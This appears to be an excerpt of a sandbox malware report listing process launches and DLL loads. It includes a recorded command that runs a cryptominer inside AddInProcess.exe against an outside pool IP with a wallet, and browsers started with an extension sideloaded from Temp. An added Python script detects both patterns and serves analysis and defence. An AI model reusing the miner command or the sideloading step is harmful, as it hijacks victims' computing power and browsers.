Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2120,i,14171565827234090732,9899416858446876294,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2028,i,6617554079144185053,3298712530362425133,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3028 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Process created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe "C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior (line repeated 2 times in the report)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1964,i,18268589753722857029,6653790801772642783,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior (line repeated 10 times in the report)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior (line repeated 13 times in the report)
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown (line repeated 2 times in the report)
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1988,i,7184690276915472336,9481308763283154706,262144 /prefetch:3
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7508 -s 1516
Source: C:\Windows\System32\WerFault.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown (line repeated 2 times in the report)
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown (line repeated 13 times in the report)
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6680 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6956 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown (line repeated 10 times in the report)
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3028 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2028,i,6617554079144185053,3298712530362425133,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2120,i,14171565827234090732,9899416858446876294,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown (line repeated 2 times in the report)
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2028,i,6617554079144185053,3298712530362425133,262144 /prefetch:3
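Two command lines in the process-creation block above are the ones worth turning into a detection: the Microsoft-signed AddInProcess.exe started by Target.exe with XMRig-style pool, wallet and algorithm switches, and Chrome and Edge started by zcezeaqsuhi.exe with --load-extension pointing at a directory under %TEMP%. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It tokenizes each command line, extracts the pool/wallet/worker/algo fields from the miner switches, flags AddInProcess.exe whenever it carries switches other than the /guid: and /pid: pair the System.AddIn host normally passes (an assumption about normal use, not something the report states), and flags any --load-extension whose path is user-writable. The sample events are constructed from the lines above plus one benign control; the vendor path, GUID and PID in that control are invented.

```python
"""Triage process-creation command lines for the two launch patterns in the
report above: an XMRig-style miner hosted in the Microsoft-signed
AddInProcess.exe, and a browser started with --load-extension pointing at a
directory the user can write to."""
import re
from dataclasses import dataclass, field

# Constructed sample events (parent image, command line). The first three are
# copied from the process-creation lines above; the fourth is a benign control
# written for this example: the /guid: /pid: form is assumed to be how the
# System.AddIn host normally starts AddInProcess.exe (not stated in the report).
SAMPLE_EVENTS = [
    (r"C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe",
     r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 "
     r"-u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU "
     r"-p x --algo rx/0 --cpu-max-threads-hint=50"),
    (r"C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe",
     r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"'),
    (r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility '
     r"--utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none "
     r"--mojo-platform-channel-handle=2096 /prefetch:3"),
    (r"C:\Program Files\ExampleVendor\Host.exe",
     r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe "
     r"/guid:{0e3e2d5c-1b3c-4a8f-9b1a-8d7c6e5f4a3b} /pid:4120"),
]

MINER_POOL_RE = re.compile(r"^(?:stratum\+(?:tcp|ssl)://)?[\w.\-]+:\d{2,5}$")
MINER_ALGO_RE = re.compile(r"^(?:rx|cn|argon2|ghostrider|kawpow)", re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:Users\\[^\\]+\\AppData|ProgramData|Windows\\Temp)\\", re.I)
EXPECTED_ADDIN_ARGS = ("/guid:", "/pid:")  # assumed legitimate form, see above


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_args(tokens):
    """Map switches to values: --k=v, --k v, -k v, /k:v and bare switches (None)."""
    args, i = {}, 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith(("-", "/")):
            if "=" in tok:
                key, val = tok.split("=", 1)
                args[key] = val.strip('"')
            elif i + 1 < len(tokens) and not tokens[i + 1].startswith(("-", "/")):
                args[tok] = tokens[i + 1]
                i += 1
            else:
                args[tok] = None
        i += 1
    return args


@dataclass
class Finding:
    rule: str
    image: str
    detail: dict = field(default_factory=dict)


def analyze(parent, cmdline):
    """Return the findings for one process-creation event."""
    tokens = tokenize(cmdline)
    if not tokens:
        return []
    image = tokens[0]
    base = image.rsplit("\\", 1)[-1].lower()
    args = parse_args(tokens[1:])
    findings = []

    # 1. XMRig-style CLI: a pool host:port plus a wallet/user or a known algo name.
    pool = args.get("-o") or args.get("--url")
    user = args.get("-u") or args.get("--user")
    algo = args.get("-a") or args.get("--algo")
    if pool and MINER_POOL_RE.match(pool) and (user or (algo and MINER_ALGO_RE.match(algo))):
        wallet, _, worker = (user or "").partition(".")
        findings.append(Finding("xmrig_cli", image, {
            "pool": pool, "wallet": wallet, "worker": worker, "algo": algo,
            "threads_hint": args.get("--cpu-max-threads-hint")}))

    # 2. The signed .NET add-in host carrying switches it never takes itself:
    #    the image is trusted, so the arguments are the only tell of hollowing.
    if base == "addinprocess.exe":
        unexpected = [k for k in args if not k.lower().startswith(EXPECTED_ADDIN_ARGS)]
        if unexpected:
            findings.append(Finding("addinprocess_unexpected_args", image,
                                    {"parent": parent, "args": unexpected}))

    # 3. Unpacked extension loaded at launch without going through the store;
    #    worst when it lives under AppData, ProgramData or a Temp directory.
    ext = args.get("--load-extension")
    if ext is not None:
        findings.append(Finding("browser_extension_sideload", image, {
            "parent": parent, "path": ext,
            "user_writable": bool(USER_WRITABLE_RE.search(ext))}))
    return findings


def scan(events):
    """Index of event -> findings, for every event that produced at least one."""
    hits = {}
    for idx, (parent, cmdline) in enumerate(events):
        found = analyze(parent, cmdline)
        if found:
            hits[idx] = found
    return hits


if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS).items():
        for f in found:
            print(f"event {idx}: {f.rule} {f.image} {f.detail}")
```

Keying on the arguments rather than the image is the point: AddInProcess.exe has a valid Microsoft signature and lives under C:\Windows\Microsoft.NET, so image-based allowlists pass it, and the same is true of chrome.exe and msedge.exe. The pool on a bare IP with a high port, the wallet.worker pair (here worker RIG_CPU) and the extension directory under %TEMP% are the fields an analyst pivots on.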
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: taskschd.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: xmllite.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxx.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: nvapi64.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
